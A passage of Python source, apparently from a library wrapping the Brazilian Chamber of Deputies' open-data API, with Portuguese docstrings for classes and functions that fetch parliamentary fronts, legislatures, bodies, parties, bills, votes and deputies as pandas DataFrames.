----------
index : bool (default=False)
Se True, define a coluna `ordem` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de proposições do evento.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'pauta']
dados = _get(path=path, params=None)
index_col = 'ordem' if index else None
return _df(dados, index_col)
def votacoes(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Informações detalhadas de votações sobre o evento.
Retorna uma lista de dados básicos sobre votações que tenham sido
realizadas no evento. Votações só ocorrem em eventos de caráter
deliberativo. Dados complementares sobre cada votação listada podem
ser obtidos no recurso.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de de votações sobre o evento.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'votacoes']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
class Frente:
'''
Informações detalhadas sobre uma frente parlamentar.
Parâmetros
----------
cod : int
Código numérico da frente parlamentar da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico da frente parlamentar.
coordenador : dict
Informações do(a) coordenador(a) da frente parlamentar.
documento : str
URL do documento da frente parlamentar.
email : str
E-mail de contato.
id_sitacao : int
ID da situação da frente parlamentar.
keywords : str
Palavras-chaves da frente parlamentar.
legislatura : int
ID da legislatura da frente parlamentar.
situacao : str
Situação da frente parlamentar.
telefone : str
Telefone de contato.
titulo : str
Título da frente parlamentar.
uri : str
Endereço para coleta de dados direta pela API da frente parlamentar.
website : str
URL do website da frente parlamentar.
Exemplos
--------
Obter título da frente parlamentar #54258.
>>> fr = camara.Frente(cod=54258)
>>> fr.url_registro
... 'Frente Parlamentar Mista da Telessaúde'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['frentes', str(cod)])['dados']
self.coordenador = self.dados['coordenador']
self.documento = self.dados['urlDocumento']
self.email = self.dados['email']
self.id_sitacao = self.dados['idSituacao']
self.keywords = self.dados['keywords']
self.legislatura = self.dados['idLegislatura']
self.situacao = self.dados['situacao']
self.telefone = self.dados['telefone']
self.titulo = self.dados['titulo']
self.uri = self.dados['uri']
self.website = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: {self.titulo}"
def membros(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Os deputados que participam da frente parlamentar.
Uma lista dos deputados participantes da frente parlamentar e os
papéis que exerceram nessa frente (signatário, coordenador ou
presidente). Observe que, mesmo no caso de frentes parlamentares
mistas (compostas por deputados e senadores), são retornados apenas
dados sobre os deputados.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos deputados que participam da frente parlamentar.
----------------------------------------------------------------------
'''
path = ['frentes', str(self.cod), 'membros']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
class Legislatura:
'''
Informações extras sobre uma determinada legislatura da Câmara.
Parâmetros
----------
cod : int
Código numérico da legislatura da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico da legislatura.
inicio : str
Primeiro dia da legislatura.
fim : str
Último dia da legislatura.
uri : str
Endereço para coleta de dados direta pela API da legislatura.
Exemplos
--------
Obter o primeiro e último dia da legislatura #56.
>>> leg = camara.Legislatura(cod=54)
>>> leg.inicio
... '2011-02-01'
>>> leg.fim
... '2015-01-31'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['legislaturas', str(cod)])['dados']
self.fim = self.dados['dataFim']
self.inicio = self.dados['dataInicio']
self.uri = self.dados['uri']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Legislatura {self.cod}"
def mesa(
self,
inicio: str = None,
fim: str = None,
index: bool = False
) -> _pd.DataFrame:
'''
Quais deputados fizeram parte da Mesa Diretora em uma legislatura.
Retorna uma lista com dados básicos sobre todos os deputados que
ocuparam algum posto na Mesa Diretora da Câmara em algum período de
tempo dentro da legislatura. Normalmente, cada legislatura tem duas
Mesas Diretoras, com presidente, dois vice-presidentes, quatro
secretários parlamentares e os suplentes dos secretários.
Parâmetros
----------
inicio : str (default=None)
Dia de início do intervalo de tempo do qual se deseja saber a
composição da Mesa, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término do intervalo de tempo do qual se deseja saber a
composição da Mesa, no formato 'AAAA-MM-DD'.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos deputados que participam da frente parlamentar.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
path = ['legislaturas', str(self.cod), 'mesa']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Orgao:
'''
Informações detalhadas sobre um órgão da Câmara.
Parâmetros
----------
cod : int
Código numérico do órgão do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do órgão.
apelido : str
Apelido do órgão.
casa : str
Casa do órgão.
cod_tipo : int
Código do tipo do órgão.
fim : str
Data final do órgão.
inicio : str
Data inicial do órgão.
instalacao : str
Data de instalação do órgão.
nome : str
Nome do órgão.
nome_publicacao : str
Nome de publicação.
sala : str
Sala do órgão.
sigla : str
Sigla do órgão.
tipo : str
Tipo do órgão.
uri : str
Endereço para coleta de dados direta pela API do órgão.
urlWebsite : str
URL para acessar o website do órgão.
Exemplos
--------
Obter o apelido do órgão #4.
>>> org = camara.Orgao(cod=4)
>>> org.apelido
... 'Mesa Diretora'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['orgaos', str(cod)])['dados']
self.apelido = self.dados['apelido']
self.casa = self.dados['casa']
self.cod_tipo = self.dados['codTipoOrgao']
self.fim = self.dados['dataFim']
self.inicio = self.dados['dataInicio']
self.instalacao = self.dados['dataInstalacao']
self.nome = self.dados['nome']
self.nome_publicacao = self.dados['nomePublicacao']
self.sala = self.dados['sala']
self.sigla = self.dados['sigla']
self.tipo = self.dados['tipoOrgao']
self.uri = self.dados['uri']
self.urlWebsite = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Órgão {self.nome}"
def eventos(
self,
tipo_evento: str = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Os eventos ocorridos ou previstos em um órgão legislativo.
Retorna uma lista de informações resumidas dos eventos realizados
(ou a realizar) pelo órgão legislativo. Por padrão, são retornados
eventos em andamento ou previstos para o mesmo dia, dois dias antes
e dois dias depois da requisição. Parâmetros podem ser passados para
alterar esse período, bem como os tipos de eventos.
Parâmetros
----------
tipo_evento : str (default=None)
Identificador numérico do tipo de evento que se deseja obter.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if tipo_evento is not None:
params['idTipoEvento'] = tipo_evento
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['orgaos', str(self.cod), 'eventos']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def membros(
self,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de cargos de um órgão e parlamentares que os ocupam.
Retorna uma lista de dados resumidos que identificam cada parlamentar
e o cargo ou posição que ocupa ou ocupou no órgão parlamentar durante
um certo período de tempo. Se não forem passados parâmetros que
delimitem esse período, o serviço retorna os membros do órgão no
momento da requisição. Se o órgão não existir mais ou não estiver
instalado, é retornada uma lista vazia.
Parâmetros
----------
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na “página” que se deseja obter com esta
requisição.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de cargos de um órgão e parlamentares que os ocupam.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
path = ['orgaos', str(self.cod), 'membros']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def votacoes(
self,
proposicao: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = False,
ordenar_por: str = 'dataHoraRegistro',
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista de eventos com a participação do parlamentar.
Retorna uma lista de dados básicos de votações que tenham sido
realizadas em eventos realizados no órgão. Se este for um órgão
permanente da Câmara, são retornados, por padrão, dados sobre as
votações realizadas pelo órgão nos últimos 30 dias. Esse período pode
ser alterado com o uso dos parâmetros `inicio` e/ou `fim`, que por
enquanto são limitados a selecionar somente votações ocorridas em um
mesmo ano.
Caso este seja um órgão temporário, como uma comissão especial, são
listadas por padrão todas as votações ocorridas no órgão, em qualquer
período de tempo.
Dados complementares sobre cada votação listada podem ser obtidos com
o objeto `camara.Votacao`.
Parâmetros
----------
proposicao : int (default=None)
Código numérico da proposição, que podem ser obtidos por meio da
função `camara.lista_proposicoes`. Se presente, listará as
votações que tiveram a proposição como objeto de votação ou que
afetaram as proposições listadas.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraRegistro')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if proposicao is not None:
params['idProposicao'] = proposicao
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['orgaos', str(self.cod), 'votacoes']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Partido:
'''
Informações detalhadas sobre um partido.
Parâmetros
----------
cod : int
Código numérico do partido do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do partido.
facebook : str
URL da página no Facebook do partido.
legislatura : str
Código numérico da última legislatura.
lider : dict
Informações sobre o líder do partido.
logo : str
URL da logo do partido.
nome : str
Nome completo do partido.
numero : int
Número eleitoral do partido.
sigla : str
Sigla do partido.
situacao : str
Situação do partido.
total_membros : str
Total de membros do partido.
total_posse : str
Total de posse do partido.
ultima_atualizacao : str
Última atualização das informações sobre o partido.
uri : str
Endereço para coleta de dados direta pela API do partido.
uri_membros : str
Endereço para coleta de dados direta pela API dos membros do partido.
website : str
URL do website do partido.
Exemplos
--------
Obter o nome completo do partido #36899.
>>> p = camara.Partido(cod=36899)
>>> p.nome
... 'Movimento Democrático Brasileiro'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['partidos', str(cod)])['dados']
self.facebook = self.dados['urlFacebook']
self.legislatura = self.dados['status']['idLegislatura']
self.lider = self.dados['status']['lider']
self.logo = self.dados['urlLogo']
self.nome = self.dados['nome']
self.numero = self.dados['numeroEleitoral']
self.sigla = self.dados['sigla']
self.situacao = self.dados['status']['situacao']
self.total_membros = self.dados['status']['totalMembros']
self.total_posse = self.dados['status']['totalPosse']
self.ultima_atualizacao = self.dados['status']['data']
self.uri = self.dados['uri']
self.uri_membros = self.dados['status']['uriMembros']
self.website = self.dados['urlWebSite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: {self.nome}"
def membros(
self,
inicio: str = None,
fim: str = None,
legislatura: int = None,
pagina: int = 1,
itens: int = None,
ordenar_por: str = None,
asc: bool = True,
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista dos parlamentares de um partido durante um período.
Retorna uma lista de deputados que estão ou estiveram em exercício
pelo partido. Opcionalmente, pode-se usar os parâmetros `inicio`,
`fim` ou `legislatura` para se obter uma lista de deputados filiados
ao partido num certo intervalo de tempo. Isso é equivalente à função
`lista_deputados` com filtro por partido, mas é melhor para obter
informações sobre membros de partidos já extintos.
Parâmetros
----------
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
legislatura : int (default=None)
Número da legislatura, à qual os dados buscados devem corresponder.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default=None)
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos parlamentares de um partido durante um período.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
if legislatura is not None:
params['idLegislatura'] = legislatura
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
if ordenar_por is not None:
params['ordenarPor'] = ordenar_por
path = ['partidos', str(self.cod), 'membros']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Proposicao:
'''
Informações detalhadas sobre uma proposição específica.
Parâmetros
----------
cod : int
Código numérico da proposição da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico da proposição.
uri : str
Endereço para coleta de dados direta pela API da proposição.
tipo_sigla : str
Sigla do tipo de proposição.
tipo_codigo : int
Código numérico do tipo de proposição.
numero : int
Número da proposição.
ano : int
Ano da proposição.
ementa : str
Ementa da proposição.
apresentacao : str
Horário da apresentação da proposição no formato 'AAAA-MM-DD HH:MM'.
uri_orgao_numerador : str
Endereço para coleta de dados direta pela API do órgão numerador.
ultima_atualizacao : str
Data da última atualização do status da proposição.
sequencia : int
Sequência da proposição.
sigla_orgao : str
Sigla do órgão.
uri_orgao : str
Endereço para coleta de dados direta pela API do órgão.
uri_ultimo_relator : str
Endereço para coleta de dados direta pela API do último relaltor.
regime : str
Regime da proposição.
descricao_tramitacao : str
Descrição da tramitação.
cod_tipo_tramitacao : str
Código do tipo da tramitação.
descricao_situacao : str
Descrição da situação da proposição.
cod_situacao : int
Código númerico da situação da proposição.
despacho : str
Despacho.
url : str
URL da proposição.
ambito : str
Âmbito da proposição.
uri_autores : str
Endereço para coleta de dados direta pela API dos autores.
descricao_tipo : str
Descrição do tipo da proposição.
ementa_detalhada : str
Ementa detalhada da proposição.
keywords : str
Palavras-chaves da proposição.
uri_proposicao_principal : str
Endereço para coleta de dados direta pela API da proposição principal.
uri_proposicao_anterior : str
Endereço para coleta de dados direta pela API da proposição anterior.
uri_proposicao_posterior : str
Endereço para coleta de dados direta pela API da proposição posterior.
url_inteiro_teor : str
URL do inteiro teor.
urn_final : str
URN final.
texto : str
Texto da proposição.
justificativa : str
Justificativa da proposição.
Exemplos
--------
Obter a ementa da proposição #15990.
>>> prop = camara.Proposicao(cod=15990)
>>> prop.ementa
... ''Cria salvaguardas para a tecnologia no campo nuclear...'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['proposicoes', str(cod)])['dados']
self.uri = self.dados['uri']
self.tipo_sigla = self.dados['siglaTipo']
self.tipo_codigo = self.dados['codTipo']
self.numero = self.dados['numero']
self.ano = self.dados['ano']
self.ementa = self.dados['ementa']
self.apresentacao = self.dados['dataApresentacao']
self.uri_orgao_numerador = self.dados['uriOrgaoNumerador']
self.ultima_atualizacao = self.dados['statusProposicao']['dataHora']
self.sequencia = self.dados['statusProposicao']['sequencia']
self.sigla_orgao = self.dados['statusProposicao']['siglaOrgao']
self.uri_orgao = self.dados['statusProposicao']['uriOrgao']
self.uri_ultimo_relator = self.dados['statusProposicao']['uriUltimoRelator']
self.regime = self.dados['statusProposicao']['regime']
self.descricao_tramitacao = self.dados['statusProposicao']['descricaoTramitacao']
self.cod_tipo_tramitacao = self.dados['statusProposicao']['codTipoTramitacao']
self.descricao_situacao = self.dados['statusProposicao']['descricaoSituacao']
self.cod_situacao = self.dados['statusProposicao']['codSituacao']
self.despacho = self.dados['statusProposicao']['despacho']
self.url = self.dados['statusProposicao']['url']
self.ambito = self.dados['statusProposicao']['ambito']
self.uri_autores = self.dados['uriAutores']
self.descricao_tipo = self.dados['descricaoTipo']
self.ementa_detalhada = self.dados['ementaDetalhada']
self.keywords = self.dados['keywords']
self.uri_proposicao_principal = self.dados['uriPropPrincipal']
self.uri_proposicao_anterior = self.dados['uriPropAnterior']
self.uri_proposicao_posterior = self.dados['uriPropPosterior']
self.url_inteiro_teor = self.dados['urlInteiroTeor']
self.urn_final = self.dados['urnFinal']
self.texto = self.dados['texto']
self.justificativa = self.dados['justificativa']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Proposição {self.cod}"
def autores(self) -> _pd.DataFrame:
'''
Lista pessoas e/ou entidades autoras da proposição.
Retorna uma lista em que cada item identifica uma pessoa ou entidade
que é autora da proposição. Além de deputados, também podem ser
autores de proposições os senadores, a sociedade civil, assembleias
legislativas e os poderes Executivo e Judiciário.
Pelo Regimento da Câmara, todos os que assinam uma proposição são
considerados autores (art. 102), tanto os proponentes quanto os
apoiadores.
Para obter mais informações sobre cada autor, é recomendável acessar,
se disponível, a URL que é valor do campo uri.
Retorna
-------
pandas.core.frame.DataFrame
Lista pessoas e/ou entidades autoras da proposição.
----------------------------------------------------------------------
'''
path = ['proposicoes', str(self.cod), 'autores']
dados = _get(path=path, params=None)
return _df(dados, None)
def relacionadas(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista de proposições relacionadas a uma em especial.
Lista de informações básicas sobre proposições que de alguma forma se
relacionam com a proposição, como pareceres, requerimentos,
substitutivos, etc.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de proposições relacionadas a uma em especial.
----------------------------------------------------------------------
'''
path = ['proposicoes', str(self.cod), 'relacionadas']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def temas(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de áreas temáticas de uma proposição.
Lista em que cada item traz informações sobre uma área temática à qual
a proposição se relaciona, segundo classificação oficial do Centro de
Documentação e Informação da Câmara.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `codTema` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de áreas temáticas de uma proposição.
----------------------------------------------------------------------
'''
path = ['proposicoes', str(self.cod), 'temas']
dados = _get(path=path, params=None)
index_col = 'codTema' if index else None
return _df(dados, index_col)
def tramitacoes(
self,
inicio: str = None,
fim: str = None,
index: bool = False
) -> _pd.DataFrame:
'''
O histórico de passos na tramitação de uma proposta.
Lista que traz, como cada item, um “retrato” de informações que podem
ser alteradas a cada etapa de tramitação na vida da proposição (como
regime de tramitação e situação) e informações sobre o que causou esse
novo estado. Esta representação das tramitações ainda é provisória.
Parâmetros
----------
inicio : str (default=None)
Data de início da tramitação, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término da tramitação, no formato 'AAAA-MM-DD'.
index : bool (default=False)
Se True, define a coluna `sequencia` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de passos na tramitação de uma proposta.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
path = ['proposicoes', str(self.cod), 'tramitacoes']
dados = _get(path=path, params=params)
index_col = 'sequencia' if index else None
return _df(dados, index_col)
def votacoes(
self,
asc: bool = False,
ordenar_por: str = 'dataHoraRegistro',
index: bool = False
) -> _pd.DataFrame:
'''
Informações detalhadas de votações sobre a proposição.
Retorna uma lista de identificadores básicos sobre as votações na
Câmara que tiveram a proposição como objeto ou como afetada pelos seus
resultados. Dados complementares sobre cada votação listada podem ser
obtidos pelo objeto `camara.Votacao`.
Parâmetros
----------
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraRegistro')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de votações sobre a proposição.
----------------------------------------------------------------------
'''
params = {}
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['proposicoes', str(self.cod), 'votacoes']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Votacao:
'''
Informações detalhadas sobre uma votação da Câmara.
Retorna um conjunto detalhado de dados sobre a votação, tais como as
proposições que podem ter sido o objeto da votação e os efeitos de
tramitação de outras proposições que eventualmente tenham sido cadastrados
em consequência desta votação.
Parâmetros
----------
cod : str
Código alfa-numérico da votação da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : str
Código alfa-numérico da votação.
aprovacao : int
Aprovação da votação.
data : str
Data da votação.
data_regitro : str
Data e horário de registro da votação.
data_ultima_abertura : str
Data e horário da última abertura da votação.
descricao : str
Descrição da votação.
efeitos_registrados : list
Lista de efeitos registrados.
evento : int
Código numérico do evento da votação.
orgao : int
Código numérico do órgão da votação.
objetos_possiveis : list of dict
Lista de objetos possíveis.
proposicoes_afetadas : str
Proposições afetadas.
sigla_orgao : str
Sigla do órgão.
ultima_apresentacao_proposicao : dict
Última apresentação da proposição.
uri : str
Endereço para coleta de dados direta pela API da votação.
uri_evento : str
Endereço para coleta de dados direta pela API do evento.
uri_orgao : str
Endereço para coleta de dados direta pela API do órgão.
Exemplos
--------
Obter a data da votação #2265603-43.
>>> vot = camara.Votacao(cod='2265603-43')
>>> vot.data
... '2020-12-22'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['votacoes', str(cod)])['dados']
self.aprovacao = self.dados['aprovacao']
self.data = self.dados['data']
self.data_regitro = self.dados['dataHoraRegistro']
self.data_ultima_abertura = self.dados['dataHoraUltimaAberturaVotacao']
self.descricao = self.dados['descricao']
self.efeitos_registrados = self.dados['efeitosRegistrados']
self.evento = self.dados['idEvento']
self.orgao = self.dados['idOrgao']
self.objetos_possiveis = self.dados['objetosPossiveis']
self.proposicoes_afetadas = self.dados['proposicoesAfetadas']
self.sigla_orgao = self.dados['siglaOrgao']
self.ultima_apresentacao_proposicao = self.dados['ultimaApresentacaoProposicao']
self.uri = self.dados['uri']
self.uri_evento = self.dados['uriEvento']
self.uri_orgao = self.dados['uriOrgao']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Votação {self.cod}"
def orientacoes(self, index=False) -> _pd.DataFrame:
'''
O voto recomendado pelas lideranças aos seus deputados na votação.
Em muitas votações, os líderes de partidos e blocos – as bancadas –
fazem recomendações de voto para seus parlamentares. Essas orientações
de uma votação também são feitas pelas lideranças de Governo, Minoria
e as mais recentes Maioria e Oposição. Uma liderança também pode
liberar a bancada para que cada deputado vote como quiser, ou entrar
em obstrução, para que seus parlamentares não sejam contados para o
quórum da votação.
Se a votação teve orientações, este recurso retorna uma lista em que
cada item contém os identificadores de um partido, bloco ou liderança,
e o posicionamento ou voto que foi recomendado aos seus parlamentares.
Até o momento, só estão disponíveis dados sobre orientações dadas em
votações no Plenário.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `codPartidoBloco` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de recomendações pelas lideranças aos seus deputados.
----------------------------------------------------------------------
'''
path = ['votacoes', str(self.cod), 'orientacoes']
dados = _get(path=path, params=None)
index_col = 'codPartidoBloco' if index else None
return _df(dados, index_col)
def votos(self) -> _pd.DataFrame:
'''
Como cada parlamentar votou em uma votação nominal e aberta.
Se a votação da Câmara é nominal e não foi secreta, retorna uma lista
em que cada item contém os identificadores básicos de um deputado e o
voto ou posicionamento que ele registrou.
O resultado é uma lista vazia se a votação foi uma votação simbólica,
em que os votos individuais não são contabilizados. Mas há algumas
votações simbólicas que também têm registros de "votos": nesses casos,
normalmente se trata de parlamentares que pediram expressamente que
seus posicionamentos fossem registrados.
Não são listados parlamentares ausentes à votação.
Retorna
-------
pandas.core.frame.DataFrame
Lista de parlamentares.
----------------------------------------------------------------------
'''
path = ['votacoes', str(self.cod), 'votos']
dados = _get(path=path, params=None)
return _df(dados, None)
def lista_blocos(
legislatura: int = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'nome',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de dados sobre os blocos partidários.
Nas atividades parlamentares, partidos podem se juntar em blocos
partidários. Quando associados, os partidos passam a trabalhar como se
fossem um "partidão", com um só líder e um mesmo conjunto de vice-líderes.
Os blocos só podem existir até o fim da legislatura em que foram criados:
na legislatura seguinte, os mesmos partidos, se associados, formam um novo
bloco. Este recurso é uma lista dos blocos em atividade no momento da
requisição. Se forem passados números de legislaturas com o parâmetro
`legislatura`, são listados também os blocos formados e extintos nessas
legislaturas.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='nome')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de dados sobre os blocos partidários.
--------------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='blocos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_deputados(
nome: str = None,
legislatura: int = None,
uf: str = None,
partido: str = None,
sexo: str = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'nome',
index: bool = False
) -> _pd.DataFrame:
'''
Listagem e busca de deputados, segundo critérios.
Retorna uma lista de dados básicos sobre deputados que estiveram em
exercício parlamentar em algum intervalo de tempo. Se não for passado um
parâmetro de tempo, como `legislatura` ou `inicio`, a lista enumerará
somente os deputados em exercício no momento da requisição.
Parâmetros
----------
nome : str (default=None)
Parte do nome dos parlamentares.
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
uf : str (default=None)
Sigla da unidade federativa (estados e Distrito Federal).
Se None, serão retornados deputados de todos os estados.
partido : str (default=None)
Sigla do partido ao qual sejam filiados os deputados.
Para obter as siglas válidas, consulte a função `camara.lista_partidos`.
Atenção: partidos diferentes podem usar a mesma sigla em diferentes
legislaturas.
sexo : str (default=None)
Letra que designe o gênero dos parlamentares que se deseja buscar,
- 'M': Masculino;
- 'F': Feminino.
inicio : str (default=None)
